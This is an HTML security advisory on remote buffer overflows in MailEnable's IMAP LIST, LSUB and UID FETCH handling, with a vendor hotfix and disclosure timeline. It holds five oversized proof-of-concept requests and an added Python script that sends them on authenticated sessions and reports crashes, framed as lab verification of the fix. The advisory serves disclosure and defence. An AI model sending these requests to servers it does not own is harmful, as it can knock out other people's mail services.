<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="Generator" CONTENT="MS Exchange Server version 5.5.2657.88">
<TITLE>[ACSSEC-2005-11-27-0x2] Remote Overflows in Mailenable Enterprise 1.1 / Professional 1.7</TITLE>
</HEAD>
<BODY>
<BR>
<BR>
<BR>
<P><FONT SIZE=2>Re: See-Security Research and Development</FONT>
<BR><FONT SIZE=2>"A remote buffer overflow exists in MailEnable Enterprise 1.1 IMAP EXAMINE command, which allows for post authentication code execution. This vulnerability affects Mailenable Enterprise 1.1 *without* the ME-10009.EXE patch."</FONT></P>
<P><FONT SIZE=2>-- There's a reason why the ME-10009 patch was released. You're welcome!</FONT>
</P>
<BR>
<P><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
<BR><FONT SIZE=2>ACS Security Assessment Advisory - Buffer Overflow</FONT>
</P>
<P><FONT SIZE=2>ID: ACSSEC-2005-11-27 - 0x2</FONT>
</P>
<P><FONT SIZE=2>Class: Buffer Overflow</FONT>
<BR><FONT SIZE=2>Package: MailEnable Enterprise Edition version 1.1 </FONT>
<BR> <FONT SIZE=2> MailEnable Professional version 1.7 </FONT>
<BR><FONT SIZE=2>Build: Windows NT/2k/XP/2k3</FONT>
<BR><FONT SIZE=2>Reported: Dec 01, 2005</FONT>
<BR><FONT SIZE=2>Released: Dec 21, 2005</FONT>
</P>
<P><FONT SIZE=2>Remote: Yes</FONT>
<BR><FONT SIZE=2>Severity: Medium</FONT>
</P>
<P><FONT SIZE=2>Credit: Tim Shelton &lt;security-advisories@acs-inc.com&gt;</FONT>
<BR><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
</P>
<P><FONT SIZE=2>-=[ Background</FONT>
</P>
<P><FONT SIZE=2>MailEnable's mail server software provides a powerful, scalable </FONT>
<BR><FONT SIZE=2>hosted messaging platform for Microsoft Windows. MailEnable </FONT>
<BR><FONT SIZE=2>offers stability, unsurpassed flexibility and an extensive </FONT>
<BR><FONT SIZE=2>feature set which allows you to provide cost-effective mail </FONT>
<BR><FONT SIZE=2>services.</FONT>
</P>
<BR>
<P><FONT SIZE=2>-=[ Technical Description</FONT>
</P>
<P><FONT SIZE=2>Multiple vulnerabilities have been identified in MailEnable </FONT>
<BR><FONT SIZE=2>which may be exploited by remote attackers to cause a denial </FONT>
<BR><FONT SIZE=2>of service or could lead to remote code execution. The </FONT>
<BR><FONT SIZE=2>issues are due to errors in the IMAP service, which does not </FONT>
<BR><FONT SIZE=2>properly handle specially crafted LIST, LSUB and UID FETCH </FONT>
<BR><FONT SIZE=2>requests carrying over-long or malformed path arguments.</FONT>
</P>
<BR>
<P><FONT SIZE=2>-=[ Proof of Concepts</FONT>
</P>
<P><FONT SIZE=2>IMAP REQUEST: '02 LIST /.:/' + 'A'x5000</FONT>
<BR><FONT SIZE=2>IMAP REQUEST: '02 LSUB /.:/' + 'A'x5000</FONT>
<BR><FONT SIZE=2>IMAP REQUEST: '02 UID FETCH /.:/' + 'A'x5000 + ' FLAGS'</FONT>
<BR><FONT SIZE=2>IMAP REQUEST: '02 UID FETCH ' + '/...'x5 + ' FLAGS'</FONT>
<BR><FONT SIZE=2>IMAP REQUEST: '02 UID FETCH ' + '/\'x5000</FONT>
<BR><FONT SIZE=2>(Perl-style notation: 'A'x5000 is the string 'A' repeated 5000 times; each request is sent as one IMAP line terminated with CRLF.)</FONT>
</P>
<P><FONT SIZE=2>Several others exist and all have been reported to the vendor.</FONT>
</P>
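<P><FONT SIZE=2>The following Python script is an added example, not part of the original advisory or of MailEnable's own code. It builds the five proof-of-concept requests above byte for byte and, when pointed at a lab server, reports for each one whether the IMAP service rejected it, accepted it, or dropped the connection (the denial-of-service symptom described above). The LOGIN and SELECT steps reflect that LIST and LSUB are authenticated-state commands and UID FETCH a selected-state command under RFC 3501, so a mailbox account on the target is needed; the host, port, credentials and the probe() helper are assumptions made for this illustration.</FONT></P>

```python
"""Added example (not part of the ACS advisory or MailEnable): builds the
malformed IMAP requests from the advisory's proof-of-concept list and, when
pointed at a lab server, reports whether each one is rejected, accepted, or
kills the connection.  Host, port, credentials and probe() are assumptions
made for this illustration."""
import socket

TAG = b"02"          # the tag used in the advisory's requests
FILL = b"A" * 5000   # the 'A'x5000 filler


def build_requests():
    """The advisory's five proof-of-concept requests as (label, wire bytes).
    IMAP lines end in CRLF; the filler is glued to the path as in the advisory."""
    reqs = [
        ("LIST /.:/ + 5000 A",       TAG + b" LIST /.:/" + FILL),
        ("LSUB /.:/ + 5000 A",       TAG + b" LSUB /.:/" + FILL),
        ("UID FETCH /.:/ + 5000 A",  TAG + b" UID FETCH /.:/" + FILL + b" FLAGS"),
        ("UID FETCH /... x5",        TAG + b" UID FETCH " + b"/..." * 5 + b" FLAGS"),
        ("UID FETCH /\\ x5000",      TAG + b" UID FETCH " + b"/\\" * 5000),
    ]
    return [(label, line + b"\r\n") for label, line in reqs]


def tagged_status(buf, tag):
    """Scan a response buffer for the line carrying `tag` and return its
    status word (OK/NO/BAD/...), or None if the server has not finished yet.
    Untagged '* ...' data lines are skipped unless tag is b'*' (the greeting)."""
    for line in buf.split(b"\r\n"):
        parts = line.split(b" ", 2)
        if len(parts) >= 2 and parts[0] == tag:
            return parts[1].decode("ascii", "replace")
    return None


def classify(status):
    """Turn the outcome of one probe into a verdict a tester can act on."""
    if status in ("closed", "timeout"):
        return "connection lost: service crashed or hung (DoS symptom)"
    if status in ("NO", "BAD"):
        return "request rejected: the parser refused the argument"
    return "request accepted: server processed the oversized argument"


def read_status(sock, tag, timeout=5.0):
    """Read until the tagged line arrives; 'closed' if the peer hangs up,
    'timeout' if it stops answering."""
    sock.settimeout(timeout)
    buf = b""
    try:
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                return "closed"
            buf += chunk
            status = tagged_status(buf, tag)
            if status is not None:
                return status
    except socket.timeout:
        return "timeout"
    except ConnectionError:
        return "closed"


def probe(host, port, user, password):
    """Send each request on a fresh authenticated session (a crash would take
    the session with it) and return {label: verdict}.  LOGIN and SELECT INBOX
    put the session in the state RFC 3501 requires for LIST/LSUB/UID FETCH."""
    results = {}
    for label, req in build_requests():
        with socket.create_connection((host, port), timeout=5) as s:
            if read_status(s, b"*") != "OK":      # greeting is "* OK ..."
                raise RuntimeError("no IMAP greeting from %s:%d" % (host, port))
            s.sendall(b"01 LOGIN " + user + b" " + password + b"\r\n")
            if read_status(s, b"01") != "OK":
                raise RuntimeError("LOGIN failed; valid mailbox credentials required")
            s.sendall(b"03 SELECT INBOX\r\n")
            if read_status(s, b"03") != "OK":
                raise RuntimeError("SELECT INBOX failed")
            s.sendall(req)
            results[label] = classify(read_status(s, TAG))
    return results


if __name__ == "__main__":
    # Assumed lab target and account; replace with your own test server.
    for label, verdict in probe("127.0.0.1", 143, b"tester", b"secret").items():
        print("%-26s %s" % (label, verdict))
```

<P><FONT SIZE=2>Each request goes out on its own session so that a crash on one does not mask the result of the next. A "connection lost" verdict is the crash symptom; running the same script against a host with the ME-10009 hotfix applied is the way to confirm the fix on your own installation.</FONT></P>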
<P><FONT SIZE=2>-=[ Solution</FONT>
</P>
<P><FONT SIZE=2>According to Peter Fregon of MailEnable Pty. Ltd, the issues in this advisory have been fixed in the ME-10009 hotfix. Any further questions should be directed to the vendor.</FONT></P>
<P><FONT SIZE=2><A HREF="http://www.mailenable.com/hotfix/default.asp" TARGET="_blank">http://www.mailenable.com/hotfix/default.asp</A></FONT>
</P>
<P><FONT SIZE=2>-=[ Credits</FONT>
</P>
<P><FONT SIZE=2>Vulnerabilities originally reported by Tim Shelton</FONT>
</P>
<P><FONT SIZE=2>-=[ Similar References</FONT>
</P>
<P><FONT SIZE=2><A HREF="http://www.frsirt.com/english/advisories/2005/2579" TARGET="_blank">http://www.frsirt.com/english/advisories/2005/2579</A></FONT>
<BR><FONT SIZE=2><A HREF="http://www.frsirt.com/english/advisories/2005/2484" TARGET="_blank">http://www.frsirt.com/english/advisories/2005/2484</A></FONT>
</P>
<P><FONT SIZE=2>-=[ ChangeLog</FONT>
</P>
<P><FONT SIZE=2>2005-11-27 : Original Advisory</FONT>
<BR><FONT SIZE=2>2005-12-01 : Notified Vendor</FONT>
<BR><FONT SIZE=2>2005-12-03 : Vendor Response</FONT>
<BR><FONT SIZE=2>2005-12-21 : Full Disclosure</FONT>
</P>
<BR>
<BR>
<BR>
<P><FONT SIZE=2>-=[ Vendor Response</FONT>
<BR><FONT SIZE=2>-----------------------------------------------------------------</FONT>
<BR><FONT SIZE=2>Sat 12/3/2005 1:41 AM</FONT>
</P>
<P><FONT SIZE=2>Hi,</FONT>
<BR><FONT SIZE=2>Thanks for the information. We have posted a hotfix for this at the following URL:</FONT>
<BR><FONT SIZE=2><A HREF="http://www.mailenable.com/hotfix" TARGET="_blank">http://www.mailenable.com/hotfix</A></FONT>
<BR><FONT SIZE=2>We will also be updating our installation kits with this hotfix shortly.</FONT>
<BR><FONT SIZE=2> </FONT>
<BR><FONT SIZE=2>Thanks</FONT>
<BR><FONT SIZE=2>Peter Fregon</FONT>
<BR><FONT SIZE=2>MailEnable Pty. Ltd.</FONT>
<BR><FONT SIZE=2> </FONT>
<BR><FONT SIZE=2>------</FONT>
<BR><FONT SIZE=2>Friday, 2 December 2005 03:02</FONT>
<BR><FONT SIZE=2>All - </FONT>
<BR><FONT SIZE=2>Below is an internal advisory notification for MailEnable Enterprise Edition version 1.1 and possibly others. Attached is our Ethical Disclosure Policy. If you have any further questions, please do not hesitate to contact us.</FONT></P>
<P><FONT SIZE=2>Thanks, </FONT>
<BR><FONT SIZE=2>Tim Shelton </FONT>
<BR><FONT SIZE=2>ACS Security Assessment Engineering </FONT>
</P>
</BODY>
</HTML>